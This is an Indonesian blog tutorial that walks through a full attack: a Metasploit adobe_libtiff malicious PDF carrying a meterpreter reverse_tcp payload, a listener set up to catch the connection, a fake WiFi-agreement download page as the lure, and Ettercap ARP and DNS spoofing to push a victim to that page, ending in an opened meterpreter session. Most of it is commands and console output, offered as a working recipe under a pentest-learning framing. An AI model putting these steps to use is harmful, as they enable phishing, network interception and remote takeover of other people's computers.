Jangan pernah jemu mempelajari penetration test. Kali ini saya akan berbagi, bagaimana cara mengeksploit windows XP dengan metasploit. Pada thread saya sebelumnya, saya telah menjelaskan tentang metasploit vs microsoft office word, dan kali ini giliran metasploit menghajar adobe reader. =)
Mengenai adobe reader, tentu saya membicarakan tentang file berekstensi .pdf kali ini kita akan membuat file PDF jahat, yang memicu vulnerability sebuah system.
Requirements:
1. metasploit
2. apache2
3. ettercap
Briefing:
1. Gunakan metasploit untuk membuat file PDF yang disisipkan PAYLOAD
2. Gunakan apache 2 untuk membuat halaman tipuan, agar korban masuk dalam jebakan untuk mengunduh file PDF tersebut.
3. Gunakan ettercap untuk mengalihkan halaman korban, ke index apache2 kita
Walkthrough:
1. Buka terminal, lalu masukan perintah
root@red-dragon:/# msfconsole
2. Langkah berikutnya, buat file PDF jahat dengan metasploit, kemudian lakukan pengaturan exploit.
msf > use exploit/windows/fileformat/adobe_libtiff
msf exploit(adobe_libtiff) > show options
Module options (exploit/windows/fileformat/adobe_libtiff):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Exploit target:
Id Name
-- ----
0 Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)
msf exploit(adobe_libtiff) > set FILENAME Tugas.pdf
FILENAME => Tugas.pdf
msf exploit(adobe_libtiff) > setg OUTPUTPATH /root
OUTPUTPATH => /root
msf exploit(adobe_libtiff) > setg PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_libtiff) > setg LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(adobe_libtiff) > setg LPORT 4444
LPORT => 4444
msf exploit(adobe_libtiff) > exploit
[*] Creating 'Tugas.pdf' file...
[*] Generated output file /root/.msf4/data/exploits/Tugas.pdf
msf exploit(adobe_libtiff) >
3. Gunakan exploit multi handler untuk mengekploitasi korban ketika korban terpicu oleh exploit dan payload yang kita kirim.
msf exploit(adobe_libtiff) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...
4. Copy file pdf tadi ke direktori apache 2
root@red-dragon:/# cp /root/.msf4/data/exploits/Tugas.pdf /var/www/
5. Edit index.html di /var/www/ seperti ini.
<html>
<head>
<title>Warning!!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian:</u></b>Anda harus membaca persetujuan penggunaan WiFi terlebih dahulu sebelum melanjutkan aktifitas browsing anda. Unduh persetujuan di bawah ini.</p>
<p align="center">
<input align="center" type="button" name="Button" value="Download persetujuan" onClick="window.open('/Tugas.pdf','download'); return false;"></p>
</body>
</html>
6. Gunakan ettercap untuk mengalihkan setiap halaman yang diakses korban ke alamat, kali ini kita akan menggunakan plug in dns_spoof =)
root@red-dragon:/# nano /usr/share/ettercap/etter.dns
Ubah menjadi seperti ini.
* A 192.168.56.101
Kemudian eksekusi ettercap dns_spoof untuk mengalihkan setiap halaman web yang diakses korban, ke index.html yang telah kita buat tadi. =)
root@red-dragon:/# ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.56.1/ /192.168.56.50/
Keterangan:
/192.168.56.1/ adalah IP address akses poin, ini adalah target 1
/192.168.56.50/ adalah IP address korban
7. Korban akan selalu menuju halaman index.html, APAPUN alamat web yang diakses, ia akan SELALU menuju ke halaman tersebut, dan setelah ia mengunduh file, kemudian membuka file tersebut, kita akan masuk ke dalam sesi meterpreter.
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.101:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.50:1908) at Mon Oct 23 11:14:55 2011
meterpreter >
Created by: red-dragon
Thanks to: metasploit [for your greatness]
ettercap [for your intercepting ability]
Yoshephine Handini [For your support by SMS =)]
blue-dragon [for idea]
October 23, 2011
Related Posts
Berbagai Cara Update Metasploit
Hallo Exploiter, beberapa bulan yang lalu metasploit telah mengeluarkan Engine Core untuk Metasploit Framework terbarun...Hack Server Kioptrix Level 1
Beberapa hari yang lalu, saya pernah membahas mengenai De-ICE, dimana OS ini diciptakan dengan beberapa vulnerable yang...Bash auto-completer BackTrack 5
Hallo BackTracker, kali ini saya mau ngasih tau cara untuk mengaktifkan fungsi auto-completer pada BackTrack. Biasanya ...[KIOPTRIX LV3] Metasploit VS Ubuntu
Ini adalah lanjutan dari post [KIOPTRIX LV 3] Attack User Pada Pentest kali ini, saya akan mendemonstrasikan ...Savant 0day to Meterpreter
Pembahasan sebelumnya mengenai from bug to 0day EggHunter VS Savant, kita telah menemukan script 0day seperti ini ...Basic Maintaining Access
Telah dijelaskan sebelumnya tentang gaining access ke meterpreter. Seperti di sini, sini, dan di sini. Sering kali kita...Metasploit VS MiniShare
Sudah pernah dibahas sebelumnya dalam tutorial from bug to 0day against MiniShare 1.4.1. Kali ini, saya akan mendemonst...Basic Exploitation
Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system oleh user yang tidak ...Manajemen Database Metasploit
Taukah kamu? Metasploit memiliki database-nya sendiri untuk kemudahan user dalam mengarsipkan atau 'mengabadikan' momen...[HOW TO] Installing Metasploit Bleeding Edge
Ini yang saya suka dari Open Source Project. Banyak yang ikutan berkontribusi untuk memajukan project ini. Metasploit s...
Subscribe to:
Post Comments (Atom)
0 comment:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.